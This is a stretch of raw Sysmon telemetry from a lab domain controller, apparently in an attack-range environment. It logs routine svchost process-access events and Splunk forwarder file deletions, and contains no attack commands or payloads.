12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:46.914{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B37C8C881E900126329D53A818C1596,SHA256=0F8378B6993CE2DA186190CC6FAA6E83D604B2BF2E4821FE7641EB33DA7798AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:47.961{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8212CDB31693AD686B5407EF56C51E54,SHA256=064F74B4D69A1E2DA68BEC2D9801E0ED34349B607C16B884796A4D6664ACB50D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.914{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 